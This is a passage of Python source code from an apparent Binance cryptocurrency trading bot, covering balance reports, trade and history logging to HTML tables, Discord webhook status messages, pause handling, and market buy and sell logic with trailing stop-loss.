#msg2 = msg2 + ' CTT: ' + str(trade_wins+trade_losses) + ' CTW: ' + str(trade_wins) + ' CTL: ' + str(trade_losses) + ' CTWR%: ' + str(round(WIN_LOSS_PERCENT,2))
msg_discord_balance(msg1, msg2)
history_log(session_profit_incfees_perc, session_profit_incfees_total, unrealised_session_profit_incfees_perc, unrealised_session_profit_incfees_total, session_profit_incfees_perc + unrealised_session_profit_incfees_perc, session_profit_incfees_total+unrealised_session_profit_incfees_total, historic_profit_incfees_perc, historic_profit_incfees_total, trade_wins+trade_losses, trade_wins, trade_losses, WIN_LOSS_PERCENT)
except Exception as e:
write_log(f'{"balance_report"}: Exception in function: {e}')
write_log("Error on line {}".format(sys.exc_info()[-1].tb_lineno))
pass
return msg1 + msg2
def history_log(sess_profit_perc, sess_profit, sess_profit_perc_unreal, sess_profit_unreal, sess_profit_perc_total, sess_profit_total, alltime_profit_perc, alltime_profit, total_trades, won_trades, lost_trades, winloss_ratio):
global last_history_log_date
time_between_insertion = datetime.now() - last_history_log_date
if TEST_MODE:
file_prefix = 'test_'
else:
file_prefix = 'live_'
# only log balance to log file once every 60 seconds
if time_between_insertion.seconds > 60:
last_history_log_date = datetime.now()
timestamp = datetime.now().strftime("%y-%m-%d %H:%M:%S")
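# the history log is persisted as an HTML PrettyTable: load and extend the existing table, or create a new one with headers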
if os.path.exists(file_prefix + HISTORY_LOG_FILE):
HISTORY_LOG_TABLE = PrettyTable([])
with open(file_prefix + HISTORY_LOG_FILE, "r") as fp:
html = fp.read()
HISTORY_LOG_TABLE = from_html_one(html)
HISTORY_LOG_TABLE.format = True
HISTORY_LOG_TABLE.border = True
HISTORY_LOG_TABLE.align = "c"
HISTORY_LOG_TABLE.valign = "m"
HISTORY_LOG_TABLE.hrules = 1
HISTORY_LOG_TABLE.vrules = 1
HISTORY_LOG_TABLE.add_row([timestamp, len(coins_bought), TRADE_SLOTS, str(bot_paused), str(round(sess_profit_perc,2)), str(round(sess_profit,4)), str(round(sess_profit_perc_unreal,2)), str(round(sess_profit_unreal,4)), str(round(sess_profit_perc_total,2)), str(round(sess_profit_total,4)), str(round(alltime_profit_perc,2)), str(round(alltime_profit,4)), str(total_trades), str(won_trades), str(lost_trades), str(winloss_ratio)])
table_txt = HISTORY_LOG_TABLE.get_html_string()
#table_txt = HISTORY_LOG_TABLE.get_string()
else:
HISTORY_LOG_TABLE = PrettyTable([])
HISTORY_LOG_TABLE = PrettyTable(["Datetime", "Coins Holding", "Trade Slots", "Pausebot Active", "Session Profit %", "Session Profit $", "Session Profit Unrealised %", "Session Profit Unrealised $", "Session Profit Total %", "Session Profit Total $", "All Time Profit %", "All Time Profit $", "Total Trades", "Won Trades", "Lost Trades", "Win Loss Ratio"])
HISTORY_LOG_TABLE.format = True
HISTORY_LOG_TABLE.border = True
HISTORY_LOG_TABLE.align = "c"
HISTORY_LOG_TABLE.valign = "m"
HISTORY_LOG_TABLE.hrules = 1
HISTORY_LOG_TABLE.vrules = 1
# with open(HISTORY_LOG_FILE,'a+') as f:
# f.write('Datetime\tCoins Holding\tTrade Slots\tPausebot Active\tSession Profit %\tSession Profit $\tSession Profit Unrealised %\tSession Profit Unrealised $\tSession Profit Total %\tSession Profit Total $\tAll Time Profit %\tAll Time Profit $\tTotal Trades\tWon Trades\tLost Trades\tWin Loss Ratio\n')
HISTORY_LOG_TABLE.add_row([timestamp, len(coins_bought), TRADE_SLOTS, str(bot_paused), str(round(sess_profit_perc,2)), str(round(sess_profit,4)), str(round(sess_profit_perc_unreal,2)), str(round(sess_profit_unreal,4)), str(round(sess_profit_perc_total,2)), str(round(sess_profit_total,4)), str(round(alltime_profit_perc,2)), str(round(alltime_profit,4)), str(total_trades), str(won_trades), str(lost_trades), str(winloss_ratio)])
table_txt = HISTORY_LOG_TABLE.get_html_string()
#table_txt = HISTORY_LOG_TABLE.get_string()
if not table_txt == "":
with open(file_prefix + HISTORY_LOG_FILE,'w') as f:
#f.write(f'{timestamp}\t{len(coins_bought)}\t{TRADE_SLOTS}\t{str(bot_paused)}\t{str(round(sess_profit_perc,2))}\t{str(round(sess_profit,4))}\t{str(round(sess_profit_perc_unreal,2))}\t{str(round(sess_profit_unreal,4))}\t{str(round(sess_profit_perc_total,2))}\t{str(round(sess_profit_total,4))}\t{str(round(alltime_profit_perc,2))}\t{str(round(alltime_profit,4))}\t{str(total_trades)}\t{str(won_trades)}\t{str(lost_trades)}\t{str(winloss_ratio)}\n')
f.write(table_txt)
def write_log(logline):
try:
timestamp = datetime.now().strftime("%y-%m-%d %H:%M:%S")
if TEST_MODE:
file_prefix = 'test_'
else:
file_prefix = 'live_'
with open(file_prefix + LOG_FILE,'a') as f:
f.write(timestamp + ' ' + logline + '\n')
#f.write(logline)
#f.write("n")
print(f'{logline}')
except Exception as e:
print(f'{"write_log"}: Exception in function: {e}')
print("Error on line {}".format(sys.exc_info()[-1].tb_lineno))
exit(1)
def write_log_trades(logline):
#timestamp = datetime.now().strftime("%y-%m-%d %H:%M:%S")
if TEST_MODE:
file_prefix = 'test_'
else:
file_prefix = 'live_'
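# the trade log is stored as an HTML PrettyTable; append the new row to the existing table or create the table with its headers first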
if os.path.exists(file_prefix + TRADES_LOG_FILE):
LOGTABLE = PrettyTable([])
with open(file_prefix + TRADES_LOG_FILE, "r") as fp:
html = fp.read()
LOGTABLE = from_html_one(html)
LOGTABLE.format = True
LOGTABLE.border = True
LOGTABLE.align = "c"
LOGTABLE.valign = "m"
LOGTABLE.hrules = 1
LOGTABLE.vrules = 1
LOGTABLE.add_row(logline)
#table_txt = LOGTABLE.get_string()
LOGTABLE.sortby = "Datetime"
table_txt = LOGTABLE.get_html_string()
else:
LOGTABLE = PrettyTable([])
LOGTABLE = PrettyTable(["Datetime", "Type", "Coin", "Volume", "Buy Price", "Amount of Buy", "Sell Price", "Amount of Sell", "Sell Reason", "Profit $"])
LOGTABLE.format = True
LOGTABLE.border = True
LOGTABLE.align = "c"
LOGTABLE.valign = "m"
LOGTABLE.hrules = 1
LOGTABLE.vrules = 1
LOGTABLE.add_row(logline)
LOGTABLE.sortby = "Coin"
table_txt = LOGTABLE.get_html_string()
#table_txt = LOGTABLE.get_string()
#with open(TRADES_LOG_FILE,'w') as f:
#improving the presentation of the log file
#f.write('Datetime\t\tType\t\tCoin\t\t\tVolume\t\t\tBuy Price\t\tCurrency\t\t\tSell Price\tProfit $\t\tProfit %\tSell Reason\t\t\t\tEarned\n')
if not table_txt == "":
with open(file_prefix + TRADES_LOG_FILE,'w') as f:
#f.write(timestamp + ' ' + logline + '\n')
f.write(table_txt)
def msg_discord_balance(msg1, msg2):
global last_msg_discord_balance_date, discord_msg_balance_data
time_between_insertion = datetime.now() - last_msg_discord_balance_date
# only push the balance message to Discord if the balance information has changed since the last message
# the send interval was increased from 60 seconds to 2 minutes to reduce message noise
if time_between_insertion.seconds > 120:
if msg2 != discord_msg_balance_data:
msg_discord(msg1 + msg2)
discord_msg_balance_data = msg2
else:
# ping msg to know the bot is still running
msg_discord(".")
#the variable is initialized so that sending messages every 2 minutes can work
last_msg_discord_balance_date = datetime.now()
def msg_discord(msg):
message = msg + '\n\n'
if MSG_DISCORD:
#Webhook of my channel. Click on edit channel --> Webhooks --> Creates webhook
mUrl = "https://discordapp.com/api/webhooks/"+DISCORD_WEBHOOK
data = {"content": message}
response = requests.post(mUrl, json=data)
#BB
# print(response.content)
def pause_bot():
'''Pause the script when external indicators detect a bearish trend in the market'''
global bot_paused, session_profit_incfees_perc, hsp_head, session_profit_incfees_total, PAUSEBOT_MANUAL
PAUSEBOT = False
# start counting for how long the bot has been paused
start_time = time.perf_counter()
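# buying is paused if any *.pause or *.exc file is present in the signals folder, or if the manual pause flag is set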
try:
files = []
folder = "signals"
files = [item for sublist in [glob.glob(folder + ext) for ext in ["/*.pause", "/*.exc"]] for item in sublist]
for filename in files:
if os.path.exists(filename) == True:
PAUSEBOT = True
break
while PAUSEBOT or PAUSEBOT_MANUAL: #os.path.exists("signals/pausebot.pause") or PAUSEBOT_MANUAL:
# do NOT accept any external signals to buy while in pausebot mode
remove_external_signals('buy')
if bot_paused == False:
if PAUSEBOT_MANUAL:
if not SCREEN_MODE == 0: print(f'{txcolors.WARNING}BOT: {txcolors.WARNING}Purchase paused manually, stop loss and take profit will continue to work...{txcolors.DEFAULT}')
msg = str(datetime.now()) + ' | PAUSEBOT. Purchase paused manually, stop loss and take profit will continue to work...'
else:
if not SCREEN_MODE == 0: print(f'{txcolors.WARNING}BOT: {txcolors.WARNING}Buying paused due to negative market conditions, stop loss and take profit will continue to work...{txcolors.DEFAULT}')
msg = str(datetime.now()) + ' | PAUSEBOT. Buying paused due to negative market conditions, stop loss and take profit will continue to work.'
msg_discord(msg)
bot_paused = True
# Sell function needs to work even while paused
coins_sold = sell_coins()
remove_from_portfolio(coins_sold)
last_price = get_price(True)
# pausing here
if hsp_head == 1:
# if not SCREEN_MODE == 2: print(f'Paused...Session profit: {session_profit_incfees_perc:.2f}% Est: ${session_profit_incfees_total:.{decimals()}f} {PAIR_WITH}')
balance_report(last_price)
time.sleep((TIME_DIFFERENCE * 60) / RECHECK_INTERVAL)
# re-scan the signals folder so buying can resume once the pause/exc files have been removed
files = [item for sublist in [glob.glob(folder + ext) for ext in ["/*.pause", "/*.exc"]] for item in sublist]
PAUSEBOT = len(files) > 0
else:
# stop counting the pause time
stop_time = time.perf_counter()
time_elapsed = timedelta(seconds=int(stop_time-start_time))
# resume the bot and set bot_paused back to False
if bot_paused == True:
if not SCREEN_MODE == 2: print(f'{txcolors.WARNING}BOT: {txcolors.WARNING}Resuming buying due to positive market conditions, total sleep time: {time_elapsed}{txcolors.DEFAULT}')
msg = str(datetime.now()) + ' | PAUSEBOT. Resuming buying due to positive market conditions, total sleep time: ' + str(time_elapsed)
msg_discord(msg)
#PAUSEBOT = False
bot_paused = False
except Exception as e:
write_log(f'{"pause_bot"}: Exception in function: {e}')
write_log("Error on line {}".format(sys.exc_info()[-1].tb_lineno))
pass
return
def convert_volume():
'''Converts the amount given in TRADE_TOTAL from PAIR_WITH (e.g. USDT) into each coin's volume'''
volatile_coins, number_of_coins, last_price = wait_for_price()
global TRADE_TOTAL
lot_size = {}
volume = {}
try:
for coin in volatile_coins:
# Find the correct step size for each coin
# max accuracy for BTC for example is 6 decimal points
# while XRP is only 1
#try:
info = client.get_symbol_info(coin)
step_size = info['filters'][2]['stepSize']
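# e.g. a stepSize of '0.00100000' gives index('1') == 4, so 4 - 1 = 3 decimal places of volume precision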
lot_size[coin] = step_size.index('1') - 1
if lot_size[coin] < 0: lot_size[coin] = 0
#except Exception as e:
#if not SCREEN_MODE == 2: print(f'convert_volume() exception: {e}')
#pass
#except KeyboardInterrupt as ki:
#pass
#try:
#print("COIN: " + str(coin) + " TRADE_TOTAL: " + str(TRADE_TOTAL) + " last_price[coin]['price']: " + str(last_price[coin]['price']))
# calculate the volume in coin from TRADE_TOTAL in PAIR_WITH (default)
volume[coin] = float(TRADE_TOTAL / float(last_price[coin]['price']))
# define the volume with the correct step size
if coin not in lot_size:
# original code: volume[coin] = float('{:.1f}'.format(volume[coin]))
volume[coin] = int(volume[coin])
else:
# if lot size has 0 decimal points, make the volume an integer
if lot_size[coin] == 0:
volume[coin] = int(volume[coin])
else:
#volume[coin] = float('{:.{}f}'.format(volume[coin], lot_size[coin]))
volume[coin] = truncate(volume[coin], lot_size[coin])
#except Exception as e:
#if not SCREEN_MODE == 2: print(f'convert_volume()2 exception: {e}')
#pass
#except KeyboardInterrupt as ki:
#pass
except Exception as e:
write_log(f'convert_volume() exception: {e}')
write_log("Error on line {}".format(sys.exc_info()[-1].tb_lineno))
pass
#except KeyboardInterrupt as ki:
#pass
return volume, last_price
def set_exparis(pairs):
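# add a pair to the EX_PAIRS exclusion list inside config.yml so the bot stops trading it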
file_name = "config.yml"
parsed_config = load_config(file_name)
with open(file_name, 'r') as file:
data = file.readlines()
c = 0
for line in data:
c = c + 1
if "EX_PAIRS: [" in line:
break
#EX_PAIRS = parsed_config['trading_options']['EX_PAIRS']
e = False
pairs = pairs.strip().replace(PAIR_WITH,'')
for coin in EX_PAIRS:
if coin == pairs:
e = True
break
else:
e = False
if e == False:
print(f'The pair will be added to EX_PAIRS in the configuration file...')
EX_PAIRS.append(pairs)
data[c-1] = " EX_PAIRS: " + str(EX_PAIRS) + "\n"
with open(file_name, 'w') as f:
f.writelines(data)
def buy_external_signals():
external_list = {}
#signals = {}
# check directory and load pairs from files into external_list
files = []
folder = "signals"
files = [item for sublist in [glob.glob(folder + ext) for ext in ["/*.buy", "/*.exs"]] for item in sublist]
#signals = glob.glob(mask) #"signals/*.buy")
#print("signals: ", signals)
for filename in files: #signals:
for line in open(filename):
symbol = line.strip()
if symbol.replace(PAIR_WITH, "") not in EX_PAIRS:
external_list[symbol] = symbol
try:
os.remove(filename)
except:
if DEBUG: print(f'{txcolors.WARNING}BOT: {txcolors.WARNING}Could not remove external signalling file{txcolors.DEFAULT}')
return external_list
def buy():
try:
'''Place Buy market orders for each volatile coin found'''
volume, last_price = convert_volume()
orders = {}
global USED_BNB_IN_SESSION
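# place a market buy order for every volatile coin that is not already held and is not on the EX_PAIRS exclusion list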
for coin in volume:
if coin not in coins_bought and coin.replace(PAIR_WITH,'') not in EX_PAIRS:
#litle modification of Sparky
volume[coin] = math.floor(volume[coin]*100000)/100000
if not SCREEN_MODE == 2: print(f"{txcolors.WARNING}BOT: {txcolors.BUY}Preparing to buy {volume[coin]} of {coin} @ ${last_price[coin]['price']}{txcolors.DEFAULT}")
msg1 = str(datetime.now()) + ' | BUY: ' + coin + '. V:' + str(volume[coin]) + ' P$:' + str(last_price[coin]['price']) + ' ' + PAIR_WITH + ' invested:' + str(float(volume[coin])*float(last_price[coin]['price']))
msg_discord(msg1)
if TEST_MODE:
orders[coin] = [{
'symbol': coin,
'orderId': 0,
'time': datetime.now().timestamp()
}]
# Log trade
#if LOG_TRADES:
BuyUSDT = str(float(volume[coin]) * float(last_price[coin]['price'])).zfill(9)
volumeBuy = format(volume[coin], '.6f')
last_price_buy = str(format(float(last_price[coin]['price']), '.8f')).zfill(3)
BuyUSDT = str(format(float(BuyUSDT), '.14f')).zfill(4)
coin = '{0:<9}'.format(coin)
#["Datetime", "Type", "Coin", "Volume", "Buy Price", "Amount of Buy", "Sell Price", "Amount of Sell", "Sell Reason", "Profit $"] "USDTdiff"])
write_log_trades([datetime.now().strftime("%y-%m-%d %H:%M:%S"), "Buy", coin.replace(PAIR_WITH,""), round(float(volumeBuy),8), str(round(float(last_price_buy),8)), str(round(float(BuyUSDT),8)) + " " + PAIR_WITH, 0, 0, "-", 0])
write_signallsell(coin.strip().removesuffix(PAIR_WITH))
continue
# try to create a real order if the test orders did not raise an exception
try:
order_details = client.create_order(
symbol = coin,
side = 'BUY',
type = 'MARKET',
quantity = volume[coin]
)
# error handling here in case position cannot be placed
except Exception as e:
write_log(f'buy() exception: {e}')
write_log("Error on line {}".format(sys.exc_info()[-1].tb_lineno))
# run the else block if the position has been placed and return order info
else:
orders[coin] = client.get_all_orders(symbol=coin, limit=1)
# binance sometimes returns an empty list, the code will wait here until binance returns the order
while orders[coin] == []:
if DEBUG: print(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT} Binance is being slow in returning the order, calling the API again...')
orders[coin] = client.get_all_orders(symbol=coin, limit=1)
time.sleep(1)
else:
if DEBUG: print(f'Order returned, saving order to file')
if not TEST_MODE:
orders[coin] = extract_order_data(order_details)
#adding the price in USDT
volumeBuy = float(format(float(volume[coin]), '.6f'))
last_price_buy = float(format(orders[coin]['avgPrice'], '.3f'))
BuyUSDT = str(format(orders[coin]['volume'] * orders[coin]['avgPrice'], '.14f')).zfill(4)
#improving the presentation of the log file
coin = '{0:<9}'.format(coin)
buyFeeTotal1 = (volumeBuy * last_price_buy) * float(TRADING_FEE/100)
USED_BNB_IN_SESSION = USED_BNB_IN_SESSION + buyFeeTotal1
#["Datetime", "Type", "Coin", "Volume", "Buy Price", "Amount of Buy", "Sell Price", "Amount of Sell", "Sell Reason", "Profit $"] "USDTdiff"])
write_log_trades([datetime.now().strftime("%y-%m-%d %H:%M:%S"), "Buy", coin.replace(PAIR_WITH,""), round(float(volumeBuy),8), str(round(float(orders[coin]['avgPrice']),8)), str(round(float(BuyUSDT),8)) + " " + PAIR_WITH, 0, 0, "-", 0])
else:
#adding the price in USDT
BuyUSDT = float(volume[coin]) * float(last_price[coin]['price'])
volumeBuy = format(float(volume[coin]), '.6f')
last_price_buy = format(float(last_price[coin]['price']), '.3f')
BuyUSDT = str(format(BuyUSDT, '.14f')).zfill(4)
#improving the presentation of the log file
coin = '{0:<9}'.format(coin)
buyFeeTotal1 = (float(volumeBuy) * float(last_price_buy)) * float(TRADING_FEE/100)
USED_BNB_IN_SESSION = USED_BNB_IN_SESSION + buyFeeTotal1
#(["Datetime", "Type", "Coin", "Volume", "Buy Price", "Sell Price", "Sell Reason", "Profit $"]) "USDTdiff"])
write_log_trades([datetime.now().strftime("%y-%m-%d %H:%M:%S"), "Buy", coin.replace(PAIR_WITH,""), round(float(volumeBuy),8), str(round(float(last_price[coin]['price']),8)), str(round(float(BuyUSDT),8)) + " " + PAIR_WITH, 0, 0, "-", 0])
write_signallsell(coin)
else:
print(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}Signal detected, but there is already an active trade on {coin}')
except Exception as e:
write_log(f'buy() exception: {e}')
write_log("Error on line {}".format(sys.exc_info()[-1].tb_lineno))
return orders, last_price, volume
def sell_coins(tpsl_override = False, specific_coin_to_sell = ""):
try:
'''sell coins that have reached the STOP LOSS or TAKE PROFIT threshold'''
global hsp_head, session_profit_incfees_perc, session_profit_incfees_total, coin_order_id, trade_wins, trade_losses, historic_profit_incfees_perc, historic_profit_incfees_total, sell_all_coins, session_USDT_EARNED, TUP, TDOWN, TNEUTRAL, USED_BNB_IN_SESSION, TRADE_TOTAL, sell_specific_coin
externals = sell_external_signals()
last_price = get_price(False) # don't populate rolling window
#last_price = get_price(add_to_historical=True) # don't populate rolling window
coins_sold = {}
BUDGET = TRADE_TOTAL * TRADE_SLOTS
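# evaluate every held coin: adjust the trailing TP/SL first, then sell when the stop loss, take profit, an external signal or an override condition is hit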
for coin in list(coins_bought):
if sell_specific_coin and not specific_coin_to_sell == coin:
continue
LastPrice = float(last_price[coin]['price'])
sellFee = (LastPrice * (TRADING_FEE/100))
sellFeeTotal = (coins_bought[coin]['volume'] * LastPrice) * (TRADING_FEE/100)
BuyPrice = float(coins_bought[coin]['bought_at'])
buyFee = (BuyPrice * (TRADING_FEE/100))
buyFeeTotal = (coins_bought[coin]['volume'] * BuyPrice) * (TRADING_FEE/100)
PriceChange_Perc = float((LastPrice - BuyPrice) / BuyPrice * 100)
#PriceChangeIncFees_Perc = float(((LastPrice+sellFee) - (BuyPrice+buyFee)) / (BuyPrice+buyFee) * 100)
#PriceChangeIncFees_Unit = float((LastPrice+sellFee) - (BuyPrice+buyFee))
PriceChangeIncFees_Perc = float(((LastPrice-sellFee) - (BuyPrice+buyFee)) / (BuyPrice+buyFee) * 100)
PriceChangeIncFees_Unit = float((LastPrice-sellFee) - (BuyPrice+buyFee))
# define stop loss and take profit
TP = float(coins_bought[coin]['bought_at']) + ((float(coins_bought[coin]['bought_at']) * (coins_bought[coin]['take_profit']) / 100))
SL = float(coins_bought[coin]['bought_at']) + ((float(coins_bought[coin]['bought_at']) * (coins_bought[coin]['stop_loss']) / 100))
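# TP and SL are absolute prices derived from the buy price and the per-coin take_profit / stop_loss percentages (stop_loss is stored as a negative value)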
# check that the price is above the take profit and readjust SL and TP accordingly if trialing stop loss used
if LastPrice > TP and USE_TRAILING_STOP_LOSS and not sell_all_coins and not tpsl_override and not sell_specific_coin:
# increasing TP by TRAILING_TAKE_PROFIT (essentially next time to readjust SL)
#add metod from OlorinSledge
if PriceChange_Perc >= 0.8:
# price has changed by 0.8% or greater, a big change. Make the STOP LOSS trail closely to the TAKE PROFIT
# so you don't lose this increase in price if it falls back
coins_bought[coin]['take_profit'] = PriceChange_Perc + TRAILING_TAKE_PROFIT
coins_bought[coin]['stop_loss'] = coins_bought[coin]['take_profit'] - TRAILING_STOP_LOSS
else:
# price has changed by less than 0.8%, a small change. Make the STOP LOSS trail loosely to the TAKE PROFIT
# so you don't get stopped out of the trade prematurely
coins_bought[coin]['stop_loss'] = coins_bought[coin]['take_profit'] - TRAILING_STOP_LOSS
coins_bought[coin]['take_profit'] = PriceChange_Perc + TRAILING_TAKE_PROFIT
# we've got a negative stop loss - not good, we don't want this.
if coins_bought[coin]['stop_loss'] <= 0:
coins_bought[coin]['stop_loss'] = coins_bought[coin]['take_profit'] * .25
# suppress old method
#coins_bought[coin]['stop_loss'] = coins_bought[coin]['take_profit'] - TRAILING_STOP_LOSS
#coins_bought[coin]['take_profit'] = PriceChange_Perc + TRAILING_TAKE_PROFIT
# if DEBUG: print(f"{coin} TP reached, adjusting TP {coins_bought[coin]['take_profit']:.2f} and SL {coins_bought[coin]['stop_loss']:.2f} accordingly to lock-in profit")
#if DEBUG: print(f"{txcolors.WARNING}BOT: {txcolors.DEFAULT}{coin} TP reached, adjusting TP {coins_bought[coin]['take_profit']:.{decimals()}f} and SL {coins_bought[coin]['stop_loss']:.{decimals()}f} accordingly to lock-in profit")
if DEBUG: print(f"{txcolors.WARNING}BOT: {txcolors.DEFAULT}{coin} TP reached, adjusting TP {str(round(TP,2))} and SL {str(round(SL,2))} accordingly to lock-in profit")
continue
# check that the price is below the stop loss or above take profit (if trailing stop loss not used) and sell if this is the case
sellCoin = False
sell_reason = ""
if SELL_ON_SIGNAL_ONLY:
# only sell if told to by external signal
if coin in externals:
sellCoin = True
sell_reason = 'External Sell Signal'
else:
if LastPrice < SL:
sellCoin = True
if USE_TRAILING_STOP_LOSS:
if PriceChange_Perc >= 0:
sell_reason = "TTP " #+ str(SL) + " reached"
else:
sell_reason = "TSL " #+ str(SL) + " reached"
else:
sell_reason = "SL " #+ str(SL) + " reached"
sell_reason = sell_reason + str(format(SL, ".18f")) + " reached"
#sell_reason = sell_reason + str(round(SL,2)) + " reached"
if LastPrice > TP:
sellCoin = True
#sell_reason = "TP " + str(format(SL, ".18f")) + " reached"
sell_reason = "TP " + str(round(TP,2)) + " reached"
if coin in externals:
sellCoin = True
sell_reason = 'External Sell Signal'
if sell_all_coins:
sellCoin = True
sell_reason = 'Sell All Coins'
if sell_specific_coin:
sellCoin = True
sell_reason = 'Sell Specific Coin'
if tpsl_override:
sellCoin = True
sell_reason = 'Session TPSL Override reached'
if sellCoin:
print(f"{txcolors.WARNING}BOT: {txcolors.SELL_PROFIT if PriceChangeIncFees_Perc >= 0. else txcolors.SELL_LOSS}Sell: {coins_bought[coin]['volume']} of {coin} | {sell_reason} | ${float(LastPrice):g} - ${float(BuyPrice):g} | Profit: {PriceChangeIncFees_Perc:.2f}% Est: {((float(coins_bought[coin]['volume'])*float(coins_bought[coin]['bought_at']))*PriceChangeIncFees_Perc)/100:.{decimals()}f} {PAIR_WITH} (Inc Fees) {PAIR_WITH} earned: {(float(coins_bought[coin]['volume'])*float(coins_bought[coin]['bought_at']))}{txcolors.DEFAULT}")
msg1 = str(datetime.now()) + '| SELL: ' + coin + '. R:' + sell_reason + ' P%:' + str(round(PriceChangeIncFees_Perc,2)) + ' P$:' + str(round(((float(coins_bought[coin]['volume'])*float(coins_bought[coin]['bought_at']))*PriceChangeIncFees_Perc)/100,4)) + ' ' + PAIR_WITH + ' earned:' + str(float(coins_bought[coin]['volume'])*float(coins_bought[coin]['bought_at']))
msg_discord(msg1)
# try to create a real order
try:
if not TEST_MODE:
#lot_size = coins_bought[coin]['step_size']
#if lot_size == 0:
# lot_size = 1
#lot_size = lot_size.index('1') - 1
#if lot_size < 0:
# lot_size = 0
order_details = client.create_order(
symbol = coin,
side = 'SELL',
type = 'MARKET',
quantity = coins_bought[coin]['volume']
)
# error handling here in case position cannot be placed
except Exception as e:
#if repr(e).upper() == "APIERROR(CODE=-1111): PRECISION IS OVER THE MAXIMUM DEFINED FOR THIS ASSET.":
write_log(f"{txcolors.WARNING}BOT: {txcolors.DEFAULT}sell_coins() Exception occured on selling the coin! Coin: {coin}\nSell Volume coins_bought: {coins_bought[coin]['volume']}\nPrice:{LastPrice}\nException: {e}")
# run the else block if coin has been sold and create a dict for each coin sold
else:
if not TEST_MODE:
coins_sold[coin] = extract_order_data(order_details)
LastPrice = coins_sold[coin]['avgPrice']
sellFee = coins_sold[coin]['tradeFeeUnit']
coins_sold[coin]['orderid'] = coins_bought[coin]['orderid']
priceChange = float((LastPrice - BuyPrice) / BuyPrice * 100)
# update this from the actual Binance sale information
#PriceChangeIncFees_Unit = float((LastPrice+sellFee) - (BuyPrice+buyFee))
PriceChangeIncFees_Unit = float((LastPrice-sellFee) - (BuyPrice+buyFee))
else:
coins_sold[coin] = coins_bought[coin]
# prevent system from buying this coin for the next TIME_DIFFERENCE minutes
volatility_cooloff[coin] = datetime.now()
time_held = (timedelta(seconds=datetime.now().timestamp()-int(str(coins_bought[coin]['timestamp'])[:10])).total_seconds())/3600
if not int(MAX_HOLDING_TIME) == 0:
if time_held >= int(MAX_HOLDING_TIME): set_exparis(coin)
if DEBUG:
if not SCREEN_MODE == 2: print(f"{txcolors.WARNING}BOT: {txcolors.DEFAULT}sell_coins() | Coin: {coin} | Sell Volume: {coins_bought[coin]['volume']} | Price:{LastPrice}")
# Log trade
#BB profit = ((LastPrice - BuyPrice) * coins_sold[coin]['volume']) * (1-(buyFee + sellFeeTotal))
profit_incfees_total = coins_sold[coin]['volume'] * PriceChangeIncFees_Unit
#write_log_trades(f"Sell: {coins_sold[coin]['volume']} {coin} - {BuyPrice} - {LastPrice} Profit: {profit_incfees_total:.{decimals()}f} {PAIR_WITH} ({PriceChange_Perc:.2f}%)")
SellUSDT = coins_sold[coin]['volume'] * LastPrice
USDTdiff = SellUSDT - (BuyPrice * coins_sold[coin]['volume'])
session_USDT_EARNED = session_USDT_EARNED + USDTdiff
#improving the presentation of the log file
# values are zero-padded so the columns line up in the log file table
VolumeSell = format(float(coins_sold[coin]['volume']), '.6f')
BuyPriceCoin = format(BuyPrice, '.8f')
SellUSDT = str(format(SellUSDT, '.14f')).zfill(4)
coin = '{0:<9}'.format(coin)
#BuyUSDT = (BuyPrice * coins_sold[coin]['volume'])
#last_price[coin]['price']
#["Datetime", "Type", "Coin", "Volume", "Buy Price", "Amount of Buy", "Sell Price", "Amount of Sell", "Sell Reason", "Profit $"] "USDTdiff"])
write_log_trades([datetime.now().strftime("%y-%m-%d %H:%M:%S"), "Sell", coin.replace(PAIR_WITH,""), str(round(float(VolumeSell),8)), str(round(float(BuyPrice),8)), 0, str(round(float(LastPrice),8)), str(round(float(SellUSDT),8)) + " " + PAIR_WITH, sell_reason, str(round(float(USDTdiff),8)) + " " + PAIR_WITH])
#if reinvest_mode:
# TRADE_TOTAL += (profit_incfees_total / TRADE_SLOTS)
#this is good
session_profit_incfees_total = session_profit_incfees_total + profit_incfees_total
session_profit_incfees_perc = session_profit_incfees_perc + ((profit_incfees_total/BUDGET) * 100)
historic_profit_incfees_total = historic_profit_incfees_total + profit_incfees_total
historic_profit_incfees_perc = historic_profit_incfees_perc + ((profit_incfees_total/BUDGET) * 100)
#TRADE_TOTAL*PriceChangeIncFees_Perc)/100
#if (LastPrice+sellFee) >= (BuyPrice+buyFee):
USED_BNB_IN_SESSION = USED_BNB_IN_SESSION + buyFeeTotal
#if IGNORE_FEE:
# sellFee = 0
# buyFee = 0
#if (LastPrice-sellFee) >= (BuyPrice+buyFee):
#if USDTdiff > 0.:
if (LastPrice) >= (BuyPrice):
trade_wins += 1
else:
trade_losses += 1
update_bot_stats()
if not sell_all_coins and not sell_specific_coin:
# within sell_all_coins, it will print display to screen
balance_report(last_price)
# sometimes get "rate limited" errors from Binance if we try to sell too many coins at once
# so wait 1 second in between sells
time.sleep(1)
continue
# no action; print once every TIME_DIFFERENCE
if hsp_head == 1:
if len(coins_bought) > 0:
#if not SCREEN_MODE == 2: print(f"Holding: {coins_bought[coin]['volume']} of {coin} | {LastPrice} - {BuyPrice} | Profit: {txcolors.SELL_PROFIT if PriceChangeIncFees_Perc >= 0. else txcolors.SELL_LOSS}{PriceChangeIncFees_Perc:.4f}% Est: ({(TRADE_TOTAL*PriceChangeIncFees_Perc)/100:.{decimals()}f} {PAIR_WITH}){txcolors.DEFAULT}")
if not SCREEN_MODE == 2: print(f"{txcolors.WARNING}BOT: {txcolors.DEFAULT}Holding: {coins_bought[coin]['volume']} of {coin} | {LastPrice} - {BuyPrice} | Profit: {txcolors.SELL_PROFIT if PriceChangeIncFees_Perc >= 0. else txcolors.SELL_LOSS}{PriceChangeIncFees_Perc:.4f}% Est: ({((float(coins_bought[coin]['volume'])*float(coins_bought[coin]['bought_at']))*PriceChangeIncFees_Perc)/100:.{decimals()}f} {PAIR_WITH}){txcolors.DEFAULT}")
#if hsp_head == 1 and len(coins_bought) == 0: if not SCREEN_MODE == 2: print(f"No trade slots are currently in use")
# if tpsl_override: is_bot_running = False
except Exception as e:
write_log(f'{"sell_coins"}: Exception in function: {e}')
write_log("Error on line {}".format(sys.exc_info()[-1].tb_lineno))
pass
except KeyboardInterrupt as ki:
pass
return coins_sold
def sell_all(msgreason, session_tspl_ovr = False):
global sell_all_coins
msg_discord(f'{str(datetime.now())} | SELL ALL COINS: {msgreason}')
# stop external signals so no buying/selling/pausing etc can occur
stop_signal_threads()
# sell all coins NOW!
sell_all_coins = True
coins_sold = sell_coins(session_tspl_ovr)
remove_from_portfolio(coins_sold)
# display final info to screen
last_price = get_price()
discordmsg = balance_report(last_price)
msg_discord(discordmsg)
sell_all_coins = False
